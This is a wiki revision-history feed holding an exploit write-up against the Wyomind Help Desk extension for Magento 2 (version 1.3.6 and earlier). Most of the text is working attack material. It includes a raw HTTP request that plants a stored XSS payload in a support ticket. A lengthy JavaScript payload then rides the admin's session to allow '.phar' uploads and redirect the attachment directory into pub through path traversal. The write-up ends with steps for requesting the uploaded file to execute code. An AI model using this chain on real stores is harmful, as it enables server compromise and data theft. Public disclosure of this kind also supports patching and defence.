https://pwnwiki.com/index.php?action=history&feed=atom&title=Wyomind_Help_Desk_1.3.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-hant Wyomind Help Desk 1.3.6 遠程代碼執行漏洞/zh-hant - Revision history 2026-04-03T19:14:20Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Wyomind_Help_Desk_1.3.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-hant&diff=6970&oldid=prev Pwnwiki: Created page with "==漏洞影響==" 2021-07-10T08:29:38Z <p>Created page with &quot;==漏洞影響==&quot;</p> <p><b>New page</b></p><div>&lt;languages /&gt;<br /> ==漏洞影響==<br /> Version: &lt;= 1.3.6<br /> <br /> ==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) <br /> # Date: 2021-07-07<br /> # Exploit Author: Patrik Lantz<br /> # Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html<br /> # Version: &lt;= 1.3.6<br /> # Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2<br /> <br /> <br /> The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution.<br /> <br /> A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. <br /> The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable<br /> the delivery of the XSS payload:<br /> <br /> POST /helpdesk/customer/ticket_save/ HTTP/1.1<br /> Host: &lt;redacted&gt;<br /> Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635<br /> Content-Length: 683<br /> Origin: https://&lt;redacted&gt;<br /> Connection: close<br /> Referer: https://&lt;redacted&gt;/helpdesk/customer/ticket_view/<br /> Cookie: &lt;redacted&gt;<br /> Upgrade-Insecure-Requests: 1<br /> <br /> -----------------------------243970849510445067673127196635<br /> Content-Disposition: form-data; name=&quot;form_key&quot;<br /> <br /> &lt;redacted&gt;<br /> -----------------------------243970849510445067673127196635<br /> Content-Disposition: form-data; name=&quot;object&quot;<br /> <br /> Hello<br /> -----------------------------243970849510445067673127196635<br /> Content-Disposition: form-data; name=&quot;message_cc&quot;<br /> <br /> <br /> -----------------------------243970849510445067673127196635<br /> Content-Disposition: form-data; name=&quot;content&quot;<br /> <br /> &lt;p&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/p&gt;<br /> -----------------------------243970849510445067673127196635<br /> Content-Disposition: form-data; name=&quot;hideit&quot;<br /> <br /> <br /> -----------------------------243970849510445067673127196635--<br /> <br /> <br /> <br /> The following XSS payload shown below can be used to trigger <br /> <br /> 1) Enabling file attachments in ticket messages<br /> 2) Adding 'phar' to allowed file extensions<br /> 3) Setting the attachment directory to 'helpdesk/files/../../../pub'<br /> <br /> <br /> &lt;script&gt;<br /> function successListener(e) { <br /> var doc = e.target.response<br /> var action=doc.getElementById('config-edit-form').action;<br /> <br /> function submitRequest()<br /> {<br /> var formKey = FORM_KEY;<br /> var xhr = new XMLHttpRequest();<br /> xhr.open(&quot;POST&quot;, action, true);<br /> xhr.setRequestHeader(&quot;Content-Type&quot;, &quot;multipart\/form-data; boundary=---------------------------14303502862141221692667966053&quot;);<br /> xhr.withCredentials = true;<br /> var body = &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;form_key\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> formKey + &quot;\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;config_state[wyomind_helpdesk_license]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;0\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;config_state[wyomind_helpdesk_general]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;1\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[general][fields][enabled][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;1\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[general][fields][log][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;0\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[general][fields][default_email][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[general][fields][default_status][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;1\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[general][fields][pending_status][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;2\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[general][fields][closed_status][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;3\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[general][fields][ticket_prefix][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;10000\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;config_state[wyomind_helpdesk_frontend]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;1\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[frontend][fields][menu_label][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;Support - My Tickets\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[frontend][fields][top_link_enabled][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;1\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[frontend][fields][attachments][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;1\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;config_state[wyomind_helpdesk_frontend_attachments_settings]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;1\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[frontend][groups][attachments_settings][fields][attachments_extension][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;jpeg,gif,png,pdf,phar\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[frontend][groups][attachments_settings][fields][attachments_directory_path][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;helpdesk/files/../../../pub\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[frontend][groups][attachments_settings][fields][attachments_upload_max_filesize][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;2M\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[frontend][groups][attachments_settings][fields][attachments_post_max_size][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;4M\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;config_state[wyomind_helpdesk_emails]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;1\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;config_state[wyomind_helpdesk_emails_customer_settings]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;0\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[emails][groups][customer_settings][fields][confirmation_enabled][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;0\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[emails][groups][customer_settings][fields][confirmation_content][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;Dear {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n&quot; + <br /> &quot;Your message has been sent to the support team.\r\n&quot; + <br /> &quot;Here is the message content:\x3cbr/\x3e\r\n&quot; + <br /> &quot;\&quot;{{message}}\&quot; \x3cbr/\x3e\x3cbr/\x3e\r\n&quot; + <br /> &quot;Kind Regards,\r\n&quot; + <br /> &quot;The Support Team.\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[emails][groups][customer_settings][fields][notification_enabled][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;0\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[emails][groups][customer_settings][fields][notification_content][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;Hello {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n&quot; + <br /> &quot;Your ticket \&quot;{{ticket_object}}\&quot; (#{{prefixed_id}}) has been updated.\r\n&quot; + <br /> &quot;Please login to your account via this link in order to see the new message: {{customer_account_link}}\x3cbr/\x3e\x3cbr/\x3e\r\n&quot; + <br /> &quot;Regards,\r\n&quot; + <br /> &quot;The Support Team.\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;config_state[wyomind_helpdesk_emails_support_team_settings]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;0\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[emails][groups][support_team_settings][fields][notification_enabled][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;0\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053\r\n&quot; + <br /> &quot;Content-Disposition: form-data; name=\&quot;groups[emails][groups][support_team_settings][fields][notification_content][value]\&quot;\r\n&quot; + <br /> &quot;\r\n&quot; + <br /> &quot;You received a new message from a customer.\r\n&quot; + <br /> &quot;-----------------------------14303502862141221692667966053--\r\n&quot;;<br /> var aBody = new Uint8Array(body.length);<br /> for (var i = 0; i &lt; aBody.length; i++)<br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody]));<br /> }<br /> submitRequest();<br /> }<br /> <br /> var request = new XMLHttpRequest(); <br /> request.onload = successListener; <br /> request.responseType = 'document';<br /> request.open('GET', document.querySelector('[data-ui-id=&quot;menu-wyomind-helpdesk-configuration&quot;]').querySelector('a').href, true); <br /> request.send();<br /> &lt;/script&gt; <br /> <br /> After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting<br /> <br /> https://[HOSTNAME]/&lt;ticketId&gt;/&lt;messageId&gt;/filename.phar <br /> <br /> ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the <br /> URL, for example: <br /> <br /> https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/<br /> <br /> and the messageId can be identified by hovering over the uploaded file link which will be similar to <br /> <br /> https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar<br /> <br /> in this case, the messageId is 40.<br /> &lt;/pre&gt;</div> Pwnwiki